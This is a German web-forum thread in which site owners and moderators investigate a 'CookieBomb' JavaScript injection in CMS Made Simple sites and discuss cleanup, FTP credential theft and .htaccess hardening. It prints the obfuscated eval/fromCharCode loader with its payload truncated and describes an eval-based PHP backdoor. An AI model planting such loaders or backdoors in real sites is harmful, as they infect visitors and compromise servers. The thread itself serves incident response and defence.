Du bist nicht angemeldet. Der Zugriff auf einige Boards wurde daher deaktiviert.
Seiten: 1
#1 12. August 2013 22:08
- postwurfsendung
- hat von CMS/ms gehört
- Registriert: 02. September 2012
- Beiträge: 9
Trojaner in diversen Dateien? Win32/Quidvetis.A
Hallo liebe CMSMS Benutzer,
Mich machte ein Besucher meiner Website auf folgenden Schnipsel aufmerksam:
[== PHP ==]
#0f2490# echo " "; #/0f2490#
nachdem mich folgende Fehlermeldungen im Backend stutzig machten...
[== PHP ==]
string(162) "Smarty error: [in siteprefs.tpl line 16]: syntax error: unrecognized tag: if(window.document)--document.getElementById('12') (Smarty_Compiler.class.php, line 446)" string(113) "Smarty error: [in siteprefs.tpl line 16]: syntax error: unrecognized tag '' (Smarty_Compiler.class.php, line 590)" string(145) "Smarty error: [in siteprefs.tpl line 16]: syntax error: unrecognized tag: if(qq!=null)ss=eval("St"+"ring"); (Smarty_Compiler.class.php, line 446)" string(113) "Smarty error: [in siteprefs.tpl line 16]: syntax error: unrecognized tag '' (Smarty_Compiler.class.php, line 590)" string(150) "Smarty error: [in siteprefs.tpl line 16]: syntax error: unrecognized tag: z.push(parseInt(a.substr(i,2),16)-14); (Smarty_Compiler.class.php, line 446)" string(113) "Smarty error: [in siteprefs.tpl line 16]: syntax error: unrecognized tag '' (Smarty_Compiler.class.php, line 590)"
Ich hab mich also schon geärgert, Typisch zum Sonntag Abend, begann ich zuerst mit ein kompletten FTP Backup. Dabei brachte mir meine Firewall/Virenscanner folgende Warn/Quarantänemeldung: Win32/Quidvetis.A .... und das am laufenden Band. Ich habe daraufhin eine der Dateien in meine Testumgebung kopiert und im Editor geöffnet. Und Tatsache da befindet sich ein Codeabschnitt der mit Sicherheit, dort nicht hingehört.
ich kürze diesen Teil hier mal etwas ein:
[== JS ==]
<!--0f2490-->
<script type="text/javascript" language="javascript">
try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74.....8";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));</script><!--/0f2490-->
im Bereich "a=... " befinden sich gefühlt tausend zahlen..
Ich hab die Dateien mit dem letzten Backup vor zwei Wochen verglichen, und dort ist dieser Inhalt nicht drin.
In den Adminlogs findet man ein Fehler, der scheinbar beim Versenden eines Formular enstanden ist.
Fehler beim Versand: SMTP Error: The following recipients failed: ******@gmx.de, *****@barococo.de SMTP server error: 4.7.1 192.168.48.6 has been temporarily rate limited (B-RATE), try again later
[EDIT]Es wurden .tpl , .html , .js Dateien verändert.[/EDIT]
Also jetzt möchte ich gern wissen, was macht dieser Scriptteil?
Wie kann dieser dort hin gekommen sein?
Wie verhindere ich das in Zukunft?
CMS VERSION 1.10.3
Ich bedanke mich schonmal im Vorraus für die Hilfe
Beitrag geändert von postwurfsendung (12. August 2013 22:34)
Offline
#2 12. August 2013 07:25
- NaN
- Moderator
- Ort: Halle (Saale)
- Registriert: 09. November 2010
- Beiträge: 4.436
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Wie kann dieser dort hin gekommen sein?
Wie verhindere ich das in Zukunft?CMS VERSION 1.10.3
Mit der CMS Version beantwortest Du Diese Fragen im Prinzip schon selbst.
Eventuell hilft auch dieses Thema:
http://www.cmsmadesimple.de/forum/viewtopic.php?id=3413
Also jetzt möchte ich gern wissen, was macht dieser Scriptteil?
Eigentlich unwichtig.
Ist eh alles mit irgendwelchen Zahlen verschlüsselt, die wir hier nicht sehen.
Aber sowas gibt z.B. Aufschluss:
eval(ss["fr"+"omCharCode"].apply(ss,z));
Ein unbekanntes Script, welches irgendelchen Kauderwelsch mit Hilfe von "eval()" macht, ist im Prinzip immer potenziell böse.
Kurz: Es werden ASCII Char Codes (Zahlen) in Text umgewandelt und das Resultat dann einfach ausgeführt.
Genauer:
Das Script erzeugt ein einfaches String-Objekt: ss=eval("St"+"ring")
Weiterhin werden ein Haufen Ziffern (a="74.....8";) nach einem bestimmten Algoritmus in Hexadezimal-Code umgewandelt und das Ergebnis in das Array z ( z=[]; ) gepackt ( z.push(...) ):
for(i=0;i<a.length;i+=2){
z.push(parseInt(a.substr(i,2),16)-14);
}
Man geht also in Zweierschritten alle Ziffern durch ( for(i=0;i<a.length;i+=2) ),
nimmt jeweils die Ziffern von der aktuellen Position bis zwei Stellen weiter ( a.substr(i,2) ) (erzeugt also eine insgesamt zweistellige Zahl)
und macht daraus eine Zahl mit der Basis 16 => HEX ( parseInt(..., 16) )
Dann zieht man nochmal 14 ab (warum, weiß der Geier).
Was dabei herauskommt, kann ich ohne die vollständigen Ziffern nicht mehr nachvollziehen.
Wenn man fertig ist, benutzt man die Methode fromCharCode() (siehe ss["fr"+"omCharCode"]) des oben definierten String-Objektes und wandelt mit deren Hilfe das Zahlenkauderwelsch in Text um. Man ruft diese Funktion also auf und übergibt ihr das Array von Zahlen: apply(ss,z)
Und dieses Ergebnis, der daraus resultierende Tex, wird mit Hilfe von eval() einfach ausgeführt.
Was genau da nun am Ende bei rauskommt, kann alles mögliche sein.
Das kann Werbung für andere Seiten sein. (meist Porno-Scheiße)
Das kann aber auch ein richtig bösartiges Script sein, welches Cookies & Co ausspioniert und somit an Anmeldedaten oder Infos über Surfverhalten etc. gelangt.
Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)
Offline
#3 12. August 2013 08:30
- postwurfsendung
- hat von CMS/ms gehört
- Registriert: 02. September 2012
- Beiträge: 9
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Vielen Dank für die ausführliche Beschreibung. Ist zumindestens sehr aufschlussreich, ich hab mir fast gedacht, das die veraltete Version vom CMSMS eine Sicherheitslücke hat und dadurch der Angriff ausgeführt werden konnte.
Kann es aber zufällig sein, das der Code nicht ausgeführt werden kann? Zumindestens konnte ich nicht nachvollziehen ob mir nicht bekannter Traffic erzeugt wird!
Wenn ich den zahlenwirrwarr hier rein kopiere, kann mir dann jemand, diesen entschlüsseln? Um zu sagen was das Script versucht auszuführen? geht mir halt darum, zu erörtern welcher Schaden Theoretiosch angerichtet worden ist, um dann auch wirklich bis ins letzte Detail alle Maßnahmen umzusetzen?
Offline
#4 12. August 2013 11:01
- NaN
- Moderator
- Ort: Halle (Saale)
- Registriert: 09. November 2010
- Beiträge: 4.436
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Poste das Script mal lieber nicht hier öffentlich.
Wir wollen die Leute ja nicht zu irgendwelchen Dingen animieren
Kannst es als js-Datei speichern, zip-komprimieren, irgendwo hochladen und den Link per PM schicken.
Kann es aber zufällig sein, das der Code nicht ausgeführt werden kann? Zumindestens konnte ich nicht nachvollziehen ob mir nicht bekannter Traffic erzeugt wird!
Kann natürlich auch sein.
Allerdings will das Ding auch nicht bei Dir Traffic erzeugen, sondern Probleme beim Webseitenbesucher verursachen
D.h. Deine Seite ist nur Mittel zum Zweck, aber nicht Ziel des Angriffs.
Ziel ist meist der Client.
Wie gesagt, ich weiß nicht, was genau sich hinter dem Zahlenwirrwarr verbirgt. Ob das Script aktiv werden kann oder nicht, hängt aber mit Sicherheit vom Webseitenbesucher ab. Bei mir wäre sowas bereits von NoScript oder RequestPolicy (falls das Script noch weitere externe Javascripts hätte laden wollen - was meistens der Fall ist, weil man in einem kleinen verschlüsselten Script garnicht so viel Schadcode verstecken kann) geblockt worden. Bei einem anderen könnte es aber an seine Facebook-, Twitter-, Online-Banking Cookies oder was weiß ich für Daten gelangt sein.
Es kann natürlich auch sein, dass CMSms, Smarty oder Zeichenkodierungen bei der Ausgabe zufällig dazwischenfunken und dadurch im HTML Code kein sauberes Script erzeugt wurde.
Sind aber alles nur Spekulationen.
Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)
Offline
#5 12. August 2013 11:46
- postwurfsendung
- hat von CMS/ms gehört
- Registriert: 02. September 2012
- Beiträge: 9
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Kannst es als js-Datei speichern, zip-komprimieren, irgendwo hochladen und den Link per PM schicken.
Das werde ich heute Abend mal tun.
Wäre noch die Frage wie der Schadcode injekziert wurde. Indem von dir verlinkten Thread äussert jemand, dass dies durch ein Hacken des FTP Zugangs geschehen sein könnte. Ich würde dies aber ausschließen, da es auf bei mir, auf drei Systemen, die auf unterschiedliche Webservern liegen passiert ist. Ist doch relativ unwahrscheinlich das 3 Passwörter, die jetzt nicht unbedingt unsicher waren, ergaunert wurden.
Von daher müsste ja eine Sicherheitslücke im CMS dafür verantwortlich sein, jetzt reicht da mein Fachwissen nicht weit genug um sichere Aussagen zu treffen, aber ich benutze z.B. das Modul Formmailer, um alle Formulare zu erstellen und zu verwalten. Ich könnte mich errinern mal gelesen zu haben das man über solche Formulare recht "einfach" Schadcode einschleussen kann.
Man kann doch nicht so ohne weiteres dutzende Dateien auf dem Server so weitreichend verändern?
Offline
#6 12. August 2013 12:23
- NaN
- Moderator
- Ort: Halle (Saale)
- Registriert: 09. November 2010
- Beiträge: 4.436
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Man kann doch nicht so ohne weiteres dutzende Dateien auf dem Server so weitreichend verändern?
Ach, Du würdest Dich wundern, was per Script so alles möglich ist
Da sind dann mal eben tausende Dateien binnen Sekunden infiziert.
Wäre noch die Frage wie der Schadcode injekziert wurde. Indem von dir verlinkten Thread äussert jemand, dass dies durch ein Hacken des FTP Zugangs geschehen sein könnte. Ich würde dies aber ausschließen, da es auf bei mir, auf drei Systemen, die auf unterschiedliche Webservern liegen passiert ist. Ist doch relativ unwahrscheinlich das 3 Passwörter, die jetzt nicht unbedingt unsicher waren, ergaunert wurden.
Kommt drauf, an.
Wenn die alle vom selben Rechner aus verwaltet werden, ist das überhaupt nicht verwunderlich.
FileZilla ist zwar toll, hat aber eine gravierende Sicherheitslücke, die die Mozilla-Jungs auch nicht schließen wollen: Es legt die Zugangsdaten im Klartext in einer XML-Datei ab (Mozilla ist der Meinung, es sei Aufgabe des Betriebssystems, derartige Dateien entsprechend zu sichern). Ein kleiner Virus und *schwups* sind alle FTP-Passwörter "gehackt".
Wenn die alle dieselbe CMS Version haben, dann kann es natürlich auch an der Version liegen. Aber dann musst Du Deine Serverlogs auswerten, wann da ein verdächtiger Zugriff gewesen sein könnte. Problem wird sein: Der verdächtige Zugriff wird via POST gesendet worden sein. POST Daten werden leider nicht mitgeloggt, weil das verdammt viel Daten sein können. (z.B. Upload von Bildern etc.)
Also wirst Du z.B. lediglich feststellen können, dass von irgendeiner IP aus via POST auf die index.php (oder irgendeine andere Datei) zugegriffen wurde. Was da aber alles an Daten mitgesendet wurde und welche davon dann dazu geführt haben, dass die gesendeten Daten anschließend Schaden anrichten konnten, wirst Du so leider nie erfahren. Da müsste man jetzt ganz genau den PHP Code überprüfen, was mit eingehenden Daten gemacht wird, welche Module sie wie weiterverarbeiten, sämtliche Fälle durchspielen etc. ... Sisyphos.
Modul Formmailer
Das Modul sagt mir leider nichts.
Möglich ist daher nahezu alles.
Sogar, dass es nichts mit dem CMSms Core sondern einzig und allein nur mit einem einzigen Modul/Plugin/UDT zu tun hat.
Es müssen auch nichtmal Deine Webseite oder Dein FTP Account gewesen sein, die gehackt wurden. Es kann auch eine völlig andere Webseite gewesen sein, die nur auf dem selben Server liegt. Worpress ist z.B. von solchen Fällen wie bei Dir ebenfalls betroffen. Je nach Schwere der Sicherheitslücke kann der gesamte Server in Mitleidenschaft gezogen werden. Also auch Webseiten, die eigentlich sicher sind. Darüber müsste Dir aber Dein Provider evtl. mehr Auskunft geben können.
Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)
Offline
#7 12. August 2013 12:35
- NaN
- Moderator
- Ort: Halle (Saale)
- Registriert: 09. November 2010
- Beiträge: 4.436
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Nachtrag: solche Hack-Angriffe erfolgen übrigens meist in mehreren Phasen.
Phase 1: Informationen sammeln (Webseiten, FTP-Passwörter, Sicherheitslücken).
Phase 2: ein kleines unauffälliges PHP-Script über FTP oder Sicherheitslücke auf den Server laden. Das Ding braucht z.B. im Prinzip nichts weiter zu machen als eingehende POST-Daten ungeprüft mit eval() auszuführen.
(gab da mal vor einer Weile eine ominöse s.php, die genau das machte)
Selbst wenn Deine Webseite bis jetzt keine einzige Sicherheitslücke hatte, hat sie spätestens jetzt einen ganzen GrandCanyon.
Phase 3: das Script von außen aufrufen. Dabei eventuell noch mehr Schadcode hochladen. Und was der macht, da seien der Phantasie mal keine Grenzen gesetzt.
I.d.R. wird der Angriff erst jetzt bemerkt.
Zwischen den Phasen können aber mitunter Monate vergehen.
Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)
Offline
#8 12. August 2013 13:17
- postwurfsendung
- hat von CMS/ms gehört
- Registriert: 02. September 2012
- Beiträge: 9
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Das hört sich furchtbar an, wäre ich mal lieber Kleinkind-erziehungspädagoge geworden ;-) :-/ Ich bedanke mich auf jeden fall erstmal für die ausführliche Hilfe.
Offline
#9 13. August 2013 09:04
- Elvis2012HB
- hat von CMS/ms gehört
- Ort: Stuhr/Varrel
- Registriert: 18. Dezember 2012
- Beiträge: 16
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Aaalso Ich hatte gerade das gleiche Problem. Und es hat nerven gekostet. Der Farbcode tauchte im Back und Frontend auf. Es waren 6 oder 7 Dateien befallen. Hab ich die bereinigt war der Code nach max einem Tag wieder da. Letztendlich habe ich im tmp Ordner im Unterordner templates_c eine php datei gefunden die mir mit einem Fehler angezeigt wurde(mit Netbeans) Das Ding hab ich Stumpf mal rausgelöscht. Und Seit 2 Tagen hab ich ruhe. Natürlich die anderen Dateien vorher bereinigt. Ich hoffe das wars, Werd aber trotzdem noch ein System Updaten machen. Habe auch noch die vorletzte CMSMS Version. Wenn noch wer Tips hat nehm ich gerne :-))) Dank euch
Offline
#10 13. August 2013 11:25
- NaN
- Moderator
- Ort: Halle (Saale)
- Registriert: 09. November 2010
- Beiträge: 4.436
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Im TMP Verzeichnis kann man den Zugriff von außen auf PHP Dateien via .htaccess unterbinden. Ich hatte da auch schonmal Dateien drin, die über eine Sicherheitslücke eingeschleust wurden. Weiter ist der Angreifer aber nicht gekommen, weil diese Dateien nicht ausgeführt werden konnten.
Überhaupt kann man, wenn man genau weiß was man tut, den direkten Zugriff von außen nur auf bestimmte PHP Dateien erlauben. Ich hatte das schonmal in einem anderen Thema erwähnt. Ich verbiete im Prinzip immer alles. Und nur in bestimmten Verzeichnissen darf dann von außen auf ganz bestimmte Dateien oder Dateitypen zugegriffen werden. Grenzt allerdings immer an Detektivarbeit, weil man nie genau wissen kann, welches Modul o.ä. jetzt worauf zugreifen muss.
Jedenfalls kann dann ein Angreifer hochladen was er will, er wird es nicht ausführen können.
Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)
Offline
#11 14. August 2013 08:42
- Elvis2012HB
- hat von CMS/ms gehört
- Ort: Stuhr/Varrel
- Registriert: 18. Dezember 2012
- Beiträge: 16
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Im TMP Verzeichnis kann man den Zugriff von außen auf PHP Dateien via .htaccess unterbinden.
Ahh gut zu wissen. Weißt Du zufällig ob ich irgendwo eine Art Workshop oder Anleitung finden kann wie man das macht?
Ich Fummel mich grad erst in CMSMS ein.......
Danke
Offline
#12 14. August 2013 09:38
- jeff1980
- Server-Pate
- Ort: Dortmund
- Registriert: 26. November 2010
- Beiträge: 630
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Die Angriffe scheinen sich in letzter Zeit zu häufen.
Gestern hatte ich das "Vergnügen", dass ein Paket bei Hosteurope wegen "FTP-Attacken" gesperrt wurde. In den von Hosteurope zur Verfügung gestellten Logs tauchte seit einigen Tagen eine "ftpchk3.txt" auf, die mehrmals hintereinander auf den Server kopiert und dann wieder gelöscht wurde.
In den Dateien von CMSmadesimple konnte ich keine Veränderung feststellen, obwohl dort noch eine Installation mit 1.10.3 lief. Ich habe dennoch direkt alle Files und die Datenbanken gelöscht und eine Sicherung eingespielt, die vor dem Angriff erstellt wurde. Jetzt läuft wieder alles normal.
Anscheinend hat der Sicherheitscheck von HE noch eingegriffen, bevor Schlimmeres passiert.
Die PC's, auf denen ein FTP-Zugriff zum besagten Paket eingerichtet war, waren übrigens laut "Microsoft Securtiy Essentials", "Combofix" und "Spybot search and destroy" frei von Viren und Trojanern. Ein ungutes Gefühl bleibt dennoch.
Offline
#13 14. August 2013 10:24
- nockenfell
- Moderator
- Ort: Lenzburg, Schweiz
- Registriert: 09. November 2010
- Beiträge: 2.930
- Webseite
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
NaN schrieb:Im TMP Verzeichnis kann man den Zugriff von außen auf PHP Dateien via .htaccess unterbinden.
Ahh gut zu wissen. Weißt Du zufällig ob ich irgendwo eine Art Workshop oder Anleitung finden kann wie man das macht?
In NaN's Signatur ist ein Beispiel für die Absicherung mit .htaccess verlinkt:
[dieser Beitrag wurde mit 100% recycled bits geschrieben]
Mein Blog / Diverse Links rund um CMS Made Simple
Module: btAdminer, ToolBox
Offline
#14 14. August 2013 10:30
- NaN
- Moderator
- Ort: Halle (Saale)
- Registriert: 09. November 2010
- Beiträge: 4.436
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Ahh gut zu wissen. Weißt Du zufällig ob ich irgendwo eine Art Workshop oder Anleitung finden kann wie man das macht?
Es gibt hier bereits zwei Themen, die sich mit der Absicherung von CMSms beschäftigen.
http://www.cmsmadesimple.de/forum/viewtopic.php?id=18
http://www.cmsmadesimple.de/forum/viewtopic.php?id=765
Das Thema Sicherheit ist allerdings sehr "dynamisch".
Soll heißen, es gibt da keine universal Lösung.
Und die Lösungen, die es gibt, müssen mitunter regelmäßig auf ihre Gütligkeit überprüft werden.
Ich hab in meiner Signatur eine zip-Datei mit Beispiel .htaccess Dateien für jedes CMSms Verzeichnis. Die sind aber sehr restriktiv. D.h. Du musst testen, ob Deine Webseite/Dein Backend auch noch problemlos funktioniert. Sollten Probleme auftreten, am besten den Debug-Modus einschalten (um Fehlermeldungen zu sehen) oder ggfs. mit einem Browser-Tool wie z.B. Firebug die Netzwerkkommunikation überprüfen, um festzustellen welche Datei evtl. nicht geladen werden konnte. Dann muss vielleicht nur die ein oder andere .htaccess-Datei angepasst werden. (hängt davon ab, welche Module man verwendet und worauf die alles zugreifen)
Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)
Offline
#15 14. August 2013 13:22
- Elvis2012HB
- hat von CMS/ms gehört
- Ort: Stuhr/Varrel
- Registriert: 18. Dezember 2012
- Beiträge: 16
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Elvis2012HB schrieb:NaN schrieb:Im TMP Verzeichnis kann man den Zugriff von außen auf PHP Dateien via .htaccess unterbinden.
Ahh gut zu wissen. Weißt Du zufällig ob ich irgendwo eine Art Workshop oder Anleitung finden kann wie man das macht?
In NaN's Signatur ist ein Beispiel für die Absicherung mit .htaccess verlinkt:
Klasse Danke
Offline
#16 14. August 2013 20:00
- NaN
- Moderator
- Ort: Halle (Saale)
- Registriert: 09. November 2010
- Beiträge: 4.436
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Hab mir das Javascript mal angeschaut und auch die Funktion, die da ausgeführt werden soll. Da wird ein Cookie gesetzt und anschließend ein iFrame erzeugt, welches eine bestimmte URL laden soll. (Ist das Cookie bereits gesetzt, wird nichts weiter gemacht.) Bin dieser URL mal gefolgt. Außer diversen Weiterleitungen, die zum Schluss in ein "Forbidden"-Fehler endeten, konnte ich da nichts feststellen (soll angeblich eine Wordpress-Seite gewesen sein).
Das kann jetzt bedeuten, dass diese Seite schon entlarvt und vom Netz genommen wurde. Es kann aber auch bedeuten, dass der Server aufgrund fehlender Cookies (hatte Javascript und Cookies deaktiviert) mir diesen Fehler nur vortäuschen wollte.
Das Ganze ist im Internet unter dem Namen #CookieBomb bekannt und soll den Webseitenbesucher mit Malware infizieren. Wie genau das abläuft und womit man da infiziert wird, kann ich leider nicht sagen. Vielleicht teste ich das mal getarnt als ahnungloser Internet Explorer Benutzer unter einer virtuellen Maschine.
Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)
Offline
#17 15. August 2013 23:05
- postwurfsendung
- hat von CMS/ms gehört
- Registriert: 02. September 2012
- Beiträge: 9
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Danke NAN, ich dreh mittlerweile völlig durch.
Die Installation mit dem veralteten CMS, hab ja versucht mit ein FTP Backup wiederherzustellen. Dabei konnte ich zwar alle kompromittierten Dateien beseitigen, aber hab mir auch die Installation abgeschossen.
War nicht weiter schlimm, ich hab für meine Seiten die aktuelle Version ordnunggemäß installiert und war seit letzter Nacht schon mit einen Teil der Migration fertig.
Nun sind schon wieder ALLE Systeme kompromittiert.
(Server bei Strato)
Installation 1 (Grundinstallation mit Formbuilder und Captcha, ein Formular war noch nicht aufrufbar)
Installation 2 (Grundinstallation mit Sprachpaket deutsch)
Installation 3 (Grundinstallation mit Sprachpaket deutsch)
Installation 4 (Grundinstallation mit Sprachpaket deutsch)
(Server bei all-inkl)
Installation 5 (Grundinstallation mit Modulen Formbuilder und Captcha.)
Mein Rechner ist laut AV sauber, die Passwörter von FTP, Datenbank, CMS User und E-Mailfächer sind alle geändert wurden, sind keine Halligalli Kennwörter, sind generierte mit bis zu 60 Zeichen. Der installordner wurde sofort nach Install enfernt, alle Dateiberechtigungen korrekt gesetzt.
Was mach ich den jetzt? 5 Liter Benzin drüber ....
Tatsache konnte ich den Frame mittlerweile nachvollziehen, folgt man diesen gehts zu malekal.com...
[EDIT2]
ich habe gerade auf mein all-inkl.com Space gesehen das auch nahezu alle anderen Scripte infiziert wurden, völlig unabängig vom CMSMS.... u.a. eine testinstall von Owncloud weist auch den Schadcode auf....!
Beitrag geändert von postwurfsendung (15. August 2013 23:30)
Offline
#18 15. August 2013 23:50
- nockenfell
- Moderator
- Ort: Lenzburg, Schweiz
- Registriert: 09. November 2010
- Beiträge: 2.930
- Webseite
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
ich habe gerade auf mein all-inkl.com Space gesehen das auch nahezu alle anderen Scripte infiziert wurden, völlig unabängig vom CMSMS.... u.a. eine testinstall von Owncloud weist auch den Schadcode auf....!
Wenn du neben CMSMS noch weitere Scripte auf dem Server hast, kann natürlich auch ein solches für die Sicherheitslücke verantwortlich sein. Schlussendlich reicht 1 Script in deinem Webspace um den gesamten Webspace zu infizieren.
Du kannst z.B. 10 verschiedene CMS Systeme installieren. Wenn nun ein einziges System komprimitiert wurde, lassen sich auch alle anderen Systeme komprimitieren.
[dieser Beitrag wurde mit 100% recycled bits geschrieben]
Mein Blog / Diverse Links rund um CMS Made Simple
Module: btAdminer, ToolBox
Offline
#19 15. August 2013 07:24
- postwurfsendung
- hat von CMS/ms gehört
- Registriert: 02. September 2012
- Beiträge: 9
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Du kannst z.B. 10 verschiedene CMS Systeme installieren. Wenn nun ein einziges System komprimitiert wurde, lassen sich auch alle anderen Systeme komprimitieren.
Ja stimmt natürlich. Ich würde mal als beispiel nur den Strato Space weiterverfolgen, dort war nur eine veraltete CMS version am laufen. Die hatte ich ja komplett zurückgestellt und nur als "Backup" eingespielt. Die neuen Systeme hat es dann binnen 24 Stunden wieder infiziert.
Der Support hat mich drauf aufmerksam gemacht, ich solle die FTP Logs durchgucken, und siehe da, sowohl bei All-inkl, wie auch bei Strato werden die veränderungen alle in den FTP Logs ersichtlich. Daraus sollte man jetzt schließen können das scheinbar die FTP Zugänge kompromittiert wurden?
ich würde meinen das ich aus den Logs folgendes herauslesen kann,
nahezu jeden Tag wurden erst eine oder zwei Fremddateien hochgeladen / dann kommt die Änderung der ganzen kompromittierten Dateien. Danach wurde die Fremddatei wieder entfernt. Und so zieht sich das seit zwei Wochen hin.
Mir ist aufgefallen das ich vor der Neuinstallation doch nicht die FTP Passwörter geändert habe, alle anderen schon, nur die nicht. Das hab ich jetzt mal getan.
Jetzt wieder liegt es nah das mein Rechner infiziert sein muss, wie sonst würde man ausgerechnet zwei völlig verschiedene FTP Zugänge ergaunern können. hab die Zugänge mittels Total Commander bei mir lokal gespeichert.
Aber mein AV sagt mir nichts von einer infektion, wundert mich eigentlich nicht :-)
Offline
#20 19. August 2013 23:34
- Andynium
- Moderator
- Ort: Dohna / SN / Deutschland
- Registriert: 13. September 2010
- Beiträge: 7.018
- Webseite
Re: Trojaner in diversen Dateien? Win32/Quidvetis.A
Ich könnte mich errinern mal gelesen zu haben das man über solche Formulare recht "einfach" Schadcode einschleussen kann.
Hier bei uns? Evtl. dies?
Offline
Seiten: 1